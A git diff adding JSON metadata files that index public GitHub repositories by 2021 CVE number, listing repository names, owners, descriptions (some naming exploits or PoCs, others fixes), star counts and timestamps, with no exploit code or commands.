+ "html_url": "https:\/\/github.com\/linuxdy\/CVE-2021-1732_exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-02T01:35:41Z",
+ "updated_at": "2023-09-28T11:26:23Z",
+ "pushed_at": "2021-03-30T08:32:03Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 360813608,
+ "name": "CVE-2021-1732",
+ "full_name": "Pai-Po\/CVE-2021-1732",
+ "owner": {
+ "login": "Pai-Po",
+ "id": 12437819,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12437819?v=4",
+ "html_url": "https:\/\/github.com\/Pai-Po"
+ },
+ "html_url": "https:\/\/github.com\/Pai-Po\/CVE-2021-1732",
+ "description": "CVE-2021-1732 poc & exp; tested on 20H2",
+ "fork": false,
+ "created_at": "2021-04-23T08:21:54Z",
+ "updated_at": "2024-04-24T17:28:02Z",
+ "pushed_at": "2021-04-23T08:28:53Z",
+ "stargazers_count": 66,
+ "watchers_count": 66,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 66,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 361428612,
+ "name": "Windows-Privilege-Escalation-CVE-2021-1732",
+ "full_name": "exploitblizzard\/Windows-Privilege-Escalation-CVE-2021-1732",
+ "owner": {
+ "login": "exploitblizzard",
+ "id": 61627070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4",
+ "html_url": "https:\/\/github.com\/exploitblizzard"
+ },
+ "html_url": "https:\/\/github.com\/exploitblizzard\/Windows-Privilege-Escalation-CVE-2021-1732",
+ "description": "Read my blog for more info - ",
+ "fork": false,
+ "created_at": "2021-04-25T12:55:15Z",
+ "updated_at": "2024-05-16T02:44:41Z",
+ "pushed_at": "2021-04-27T21:13:18Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 409794385,
+ "name": "CVE-2021-1732",
+ "full_name": "BeneficialCode\/CVE-2021-1732",
+ "owner": {
+ "login": "BeneficialCode",
+ "id": 40847073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40847073?v=4",
+ "html_url": "https:\/\/github.com\/BeneficialCode"
+ },
+ "html_url": "https:\/\/github.com\/BeneficialCode\/CVE-2021-1732",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-24T01:28:58Z",
+ "updated_at": "2023-09-28T11:31:42Z",
+ "pushed_at": "2021-11-08T01:36:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 451100080,
+ "name": "CVE-2021-1732-EXP-",
+ "full_name": "ExploitCN\/CVE-2021-1732-EXP-",
+ "owner": {
+ "login": "ExploitCN",
+ "id": 98264245,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4",
+ "html_url": "https:\/\/github.com\/ExploitCN"
+ },
+ "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2021-1732-EXP-",
+ "description": "对1909下windows版本的EXP进行分析,并对代码添加调试和注释",
+ "fork": false,
+ "created_at": "2022-01-23T12:40:01Z",
+ "updated_at": "2022-04-12T12:06:58Z",
+ "pushed_at": "2022-04-12T12:06:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 459669290,
+ "name": "CVE-2021-1732",
+ "full_name": "r1l4-i3pur1l4\/CVE-2021-1732",
+ "owner": {
+ "login": "r1l4-i3pur1l4",
+ "id": 76409019,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4",
+ "html_url": "https:\/\/github.com\/r1l4-i3pur1l4"
+ },
+ "html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2021-1732",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-15T16:55:31Z",
+ "updated_at": "2022-02-15T17:00:00Z",
+ "pushed_at": "2022-02-15T16:59:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 560416302,
+ "name": "CVE-2021-1732",
+ "full_name": "fenalik\/CVE-2021-1732",
+ "owner": {
+ "login": "fenalik",
+ "id": 46825027,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46825027?v=4",
+ "html_url": "https:\/\/github.com\/fenalik"
+ },
+ "html_url": "https:\/\/github.com\/fenalik\/CVE-2021-1732",
+ "description": "CVE-2021-1732 Microsoft Windows 10 本地提权漏 研究及Poc\/Exploit开发",
+ "fork": false,
+ "created_at": "2022-11-01T13:06:17Z",
+ "updated_at": "2023-06-14T10:36:15Z",
+ "pushed_at": "2022-11-01T13:07:44Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 611610528,
+ "name": "CVE-2021-1732",
+ "full_name": "4dp\/CVE-2021-1732",
+ "owner": {
+ "login": "4dp",
+ "id": 20782978,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20782978?v=4",
+ "html_url": "https:\/\/github.com\/4dp"
+ },
+ "html_url": "https:\/\/github.com\/4dp\/CVE-2021-1732",
+ "description": "CVE-2021-1732 Microsoft Windows 10 本地提权漏 研究及Poc\/Exploit开发",
+ "fork": false,
+ "created_at": "2023-03-09T07:14:45Z",
+ "updated_at": "2023-04-28T00:26:16Z",
+ "pushed_at": "2023-03-09T07:15:29Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 660179627,
+ "name": "CVE-2021-1732",
+ "full_name": "yangshifan-git\/CVE-2021-1732",
+ "owner": {
+ "login": "yangshifan-git",
+ "id": 59814204,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59814204?v=4",
+ "html_url": "https:\/\/github.com\/yangshifan-git"
+ },
+ "html_url": "https:\/\/github.com\/yangshifan-git\/CVE-2021-1732",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-29T12:23:51Z",
+ "updated_at": "2023-06-29T12:23:52Z",
+ "pushed_at": "2023-06-29T12:25:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 665029914,
+ "name": "CVE-2021-1732",
+ "full_name": "asepsaepdin\/CVE-2021-1732",
+ "owner": {
+ "login": "asepsaepdin",
+ "id": 122620685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4",
+ "html_url": "https:\/\/github.com\/asepsaepdin"
+ },
+ "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-1732",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-11T09:29:18Z",
+ "updated_at": "2023-10-24T09:27:31Z",
+ "pushed_at": "2023-07-13T04:49:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1748.json b/2021/CVE-2021-1748.json
new file mode 100644
index 0000000000..ca91de818e
--- /dev/null
+++ b/2021/CVE-2021-1748.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 401901238,
+ "name": "itmsBlock",
+ "full_name": "Ivanhoe76zzzz\/itmsBlock",
+ "owner": {
+ "login": "Ivanhoe76zzzz",
+ "id": 89883330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89883330?v=4",
+ "html_url": "https:\/\/github.com\/Ivanhoe76zzzz"
+ },
+ "html_url": "https:\/\/github.com\/Ivanhoe76zzzz\/itmsBlock",
+ "description": "Block \"itms scheme\" \/ fix CVE-2021-1748",
+ "fork": false,
+ "created_at": "2021-09-01T02:05:51Z",
+ "updated_at": "2023-09-28T11:31:01Z",
+ "pushed_at": "2021-08-31T18:12:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 402914353,
+ "name": "mistune-patch-backport",
+ "full_name": "ChiChou\/mistune-patch-backport",
+ "owner": {
+ "login": "ChiChou",
+ "id": 2802045,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2802045?v=4",
+ "html_url": "https:\/\/github.com\/ChiChou"
+ },
+ "html_url": "https:\/\/github.com\/ChiChou\/mistune-patch-backport",
+ "description": "Backporting CVE-2021-1748 patch for iOS <=14.3",
+ "fork": false,
+ "created_at": "2021-09-03T22:48:11Z",
+ "updated_at": "2023-11-23T07:05:04Z",
+ "pushed_at": "2021-09-03T22:50:08Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1782.json b/2021/CVE-2021-1782.json
new file mode 100644
index 0000000000..f2dc3d1411
--- /dev/null
+++ b/2021/CVE-2021-1782.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 336072318,
+ "name": "cve-2021-1782",
+ "full_name": "raymontag\/cve-2021-1782",
+ "owner": {
+ "login": "raymontag",
+ "id": 106421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106421?v=4",
+ "html_url": "https:\/\/github.com\/raymontag"
+ },
+ "html_url": "https:\/\/github.com\/raymontag\/cve-2021-1782",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-04T20:19:22Z",
+ "updated_at": "2023-03-29T09:27:08Z",
+ "pushed_at": "2021-03-05T21:25:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 337752034,
+ "name": "CVE-2021-1782",
+ "full_name": "synacktiv\/CVE-2021-1782",
+ "owner": {
+ "login": "synacktiv",
+ "id": 50145679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4",
+ "html_url": "https:\/\/github.com\/synacktiv"
+ },
+ "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-1782",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-10T14:38:05Z",
+ "updated_at": "2024-05-20T20:28:13Z",
+ "pushed_at": "2021-02-10T14:39:04Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1883.json b/2021/CVE-2021-1883.json
new file mode 100644
index 0000000000..f87681688e
--- /dev/null
+++ b/2021/CVE-2021-1883.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 458042189,
+ "name": "CVE-2021-1883",
+ "full_name": "gabe-k\/CVE-2021-1883",
+ "owner": {
+ "login": "gabe-k",
+ "id": 1268745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1268745?v=4",
+ "html_url": "https:\/\/github.com\/gabe-k"
+ },
+ "html_url": "https:\/\/github.com\/gabe-k\/CVE-2021-1883",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-11T04:13:25Z",
+ "updated_at": "2024-04-28T11:30:18Z",
+ "pushed_at": "2022-02-11T04:17:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1905.json b/2021/CVE-2021-1905.json
new file mode 100644
index 0000000000..7c9e56b714
--- /dev/null
+++ b/2021/CVE-2021-1905.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 370174301,
+ "name": "CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664",
+ "full_name": "TAKIANFIF\/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664",
+ "owner": {
+ "login": "TAKIANFIF",
+ "id": 50182078,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50182078?v=4",
+ "html_url": "https:\/\/github.com\/TAKIANFIF"
+ },
+ "html_url": "https:\/\/github.com\/TAKIANFIF\/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664",
+ "description": "Qualcomm GPU \/ ARM Mali GPU",
+ "fork": false,
+ "created_at": "2021-05-23T23:02:41Z",
+ "updated_at": "2021-05-23T23:02:41Z",
+ "pushed_at": "2021-05-23T23:02:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1961.json b/2021/CVE-2021-1961.json
new file mode 100644
index 0000000000..c995337392
--- /dev/null
+++ b/2021/CVE-2021-1961.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 532269054,
+ "name": "CVE-2021-1961",
+ "full_name": "tamirzb\/CVE-2021-1961",
+ "owner": {
+ "login": "tamirzb",
+ "id": 1054209,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4",
+ "html_url": "https:\/\/github.com\/tamirzb"
+ },
+ "html_url": "https:\/\/github.com\/tamirzb\/CVE-2021-1961",
+ "description": "Exploit code for CVE-2021-1961",
+ "fork": false,
+ "created_at": "2022-09-03T13:31:13Z",
+ "updated_at": "2024-05-07T17:52:18Z",
+ "pushed_at": "2022-09-07T11:47:56Z",
+ "stargazers_count": 104,
+ "watchers_count": 104,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 104,
+ "score": 0,
+ "subscribers_count": 8
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1965.json b/2021/CVE-2021-1965.json
new file mode 100644
index 0000000000..02ce74ffdb
--- /dev/null
+++ b/2021/CVE-2021-1965.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 460881511,
+ "name": "CVE-2021-1965",
+ "full_name": "parsdefense\/CVE-2021-1965",
+ "owner": {
+ "login": "parsdefense",
+ "id": 84011175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84011175?v=4",
+ "html_url": "https:\/\/github.com\/parsdefense"
+ },
+ "html_url": "https:\/\/github.com\/parsdefense\/CVE-2021-1965",
+ "description": "CVE-2021-1965 WiFi Zero Click RCE Trigger PoC",
+ "fork": false,
+ "created_at": "2022-02-18T14:19:58Z",
+ "updated_at": "2024-05-10T10:44:25Z",
+ "pushed_at": "2022-02-19T13:52:32Z",
+ "stargazers_count": 167,
+ "watchers_count": 167,
+ "has_discussions": false,
+ "forks_count": 30,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 30,
+ "watchers": 167,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 461350628,
+ "name": "CVE-2021-1965",
+ "full_name": "foxtrot\/CVE-2021-1965",
+ "owner": {
+ "login": "foxtrot",
+ "id": 4153572,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4153572?v=4",
+ "html_url": "https:\/\/github.com\/foxtrot"
+ },
+ "html_url": "https:\/\/github.com\/foxtrot\/CVE-2021-1965",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-20T00:52:01Z",
+ "updated_at": "2023-10-04T16:48:41Z",
+ "pushed_at": "2022-02-20T01:58:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1994.json b/2021/CVE-2021-1994.json
new file mode 100644
index 0000000000..02ba98fcb6
--- /dev/null
+++ b/2021/CVE-2021-1994.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 335868582,
+ "name": "weblogic2021",
+ "full_name": "somatrasss\/weblogic2021",
+ "owner": {
+ "login": "somatrasss",
+ "id": 69829610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69829610?v=4",
+ "html_url": "https:\/\/github.com\/somatrasss"
+ },
+ "html_url": "https:\/\/github.com\/somatrasss\/weblogic2021",
+ "description": "CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109",
+ "fork": false,
+ "created_at": "2021-02-04T07:03:56Z",
+ "updated_at": "2024-01-12T11:24:48Z",
+ "pushed_at": "2021-09-13T02:58:00Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20021.json b/2021/CVE-2021-20021.json
new file mode 100644
index 0000000000..f5caac2f46
--- /dev/null
+++ b/2021/CVE-2021-20021.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688571881,
+ "name": "CVE-2021-20021",
+ "full_name": "SUPRAAA-1337\/CVE-2021-20021",
+ "owner": {
+ "login": "SUPRAAA-1337",
+ "id": 128395905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128395905?v=4",
+ "html_url": "https:\/\/github.com\/SUPRAAA-1337"
+ },
+ "html_url": "https:\/\/github.com\/SUPRAAA-1337\/CVE-2021-20021",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-07T16:17:41Z",
+ "updated_at": "2024-03-18T17:53:34Z",
+ "pushed_at": "2023-09-08T17:11:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20038.json b/2021/CVE-2021-20038.json
new file mode 100644
index 0000000000..f895d010c9
--- /dev/null
+++ b/2021/CVE-2021-20038.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 446650428,
+ "name": "badblood",
+ "full_name": "jbaines-r7\/badblood",
+ "owner": {
+ "login": "jbaines-r7",
+ "id": 91965877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4",
+ "html_url": "https:\/\/github.com\/jbaines-r7"
+ },
+ "html_url": "https:\/\/github.com\/jbaines-r7\/badblood",
+ "description": "SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)",
+ "fork": false,
+ "created_at": "2022-01-11T02:25:25Z",
+ "updated_at": "2024-05-02T10:58:22Z",
+ "pushed_at": "2022-01-11T11:22:06Z",
+ "stargazers_count": 91,
+ "watchers_count": 91,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-20038",
+ "exploit",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 91,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 522394217,
+ "name": "CVE-2021-20038-SonicWall-RCE",
+ "full_name": "vesperp\/CVE-2021-20038-SonicWall-RCE",
+ "owner": {
+ "login": "vesperp",
+ "id": 28191544,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28191544?v=4",
+ "html_url": "https:\/\/github.com\/vesperp"
+ },
+ "html_url": "https:\/\/github.com\/vesperp\/CVE-2021-20038-SonicWall-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-08T03:38:06Z",
+ "updated_at": "2022-08-08T04:56:31Z",
+ "pushed_at": "2022-08-08T03:41:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20138.json b/2021/CVE-2021-20138.json
new file mode 100644
index 0000000000..2b67828715
--- /dev/null
+++ b/2021/CVE-2021-20138.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 515147295,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-20138",
+ "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-20138",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-20138",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-07-18T11:01:39Z",
+ "updated_at": "2022-07-18T11:20:13Z",
+ "pushed_at": "2022-07-18T11:34:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2021.json b/2021/CVE-2021-2021.json
new file mode 100644
index 0000000000..c73d1867d0
--- /dev/null
+++ b/2021/CVE-2021-2021.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 367292787,
+ "name": "CVE-2021-2021good",
+ "full_name": "TheCryingGame\/CVE-2021-2021good",
+ "owner": {
+ "login": "TheCryingGame",
+ "id": 48227194,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48227194?v=4",
+ "html_url": "https:\/\/github.com\/TheCryingGame"
+ },
+ "html_url": "https:\/\/github.com\/TheCryingGame\/CVE-2021-2021good",
+ "description": "This is a good projects.",
+ "fork": false,
+ "created_at": "2021-05-14T08:03:43Z",
+ "updated_at": "2021-05-14T08:03:43Z",
+ "pushed_at": "2021-05-14T08:03:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20233.json b/2021/CVE-2021-20233.json
new file mode 100644
index 0000000000..6f783dd352
--- /dev/null
+++ b/2021/CVE-2021-20233.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 515707434,
+ "name": "BootHoleFix",
+ "full_name": "pauljrowland\/BootHoleFix",
+ "owner": {
+ "login": "pauljrowland",
+ "id": 17676570,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17676570?v=4",
+ "html_url": "https:\/\/github.com\/pauljrowland"
+ },
+ "html_url": "https:\/\/github.com\/pauljrowland\/BootHoleFix",
+ "description": "This script will remediate the BootHole bug identified in CVE-2020-25632 and\/or CVE-2021-20233.",
+ "fork": false,
+ "created_at": "2022-07-19T18:56:51Z",
+ "updated_at": "2022-07-19T19:04:26Z",
+ "pushed_at": "2022-07-19T19:08:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20253.json b/2021/CVE-2021-20253.json
new file mode 100644
index 0000000000..2a20bd9e18
--- /dev/null
+++ b/2021/CVE-2021-20253.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 723466329,
+ "name": "CVE-2021-20253",
+ "full_name": "mbadanoiu\/CVE-2021-20253",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-20253",
+ "description": "CVE-2021-20253: Privilege Escalation via Job Isolation Escape in Ansible Tower",
+ "fork": false,
+ "created_at": "2023-11-25T18:56:51Z",
+ "updated_at": "2023-11-26T12:24:16Z",
+ "pushed_at": "2023-11-25T19:18:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "cve",
+ "cve-2021-20253",
+ "cves",
+ "local-privilege-escalation"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-20294.json b/2021/CVE-2021-20294.json
new file mode 100644
index 0000000000..6fbff4e5f8
--- /dev/null
+++ b/2021/CVE-2021-20294.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 591711046,
+ "name": "CVE-2021-20294-POC",
+ "full_name": "tin-z\/CVE-2021-20294-POC",
+ "owner": {
+ "login": "tin-z",
+ "id": 32848129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32848129?v=4",
+ "html_url": "https:\/\/github.com\/tin-z"
+ },
+ "html_url": "https:\/\/github.com\/tin-z\/CVE-2021-20294-POC",
+ "description": "Simple CVE-2021-20294 poc",
+ "fork": false,
+ "created_at": "2023-01-21T16:15:21Z",
+ "updated_at": "2024-05-15T07:41:34Z",
+ "pushed_at": "2023-01-21T22:37:16Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
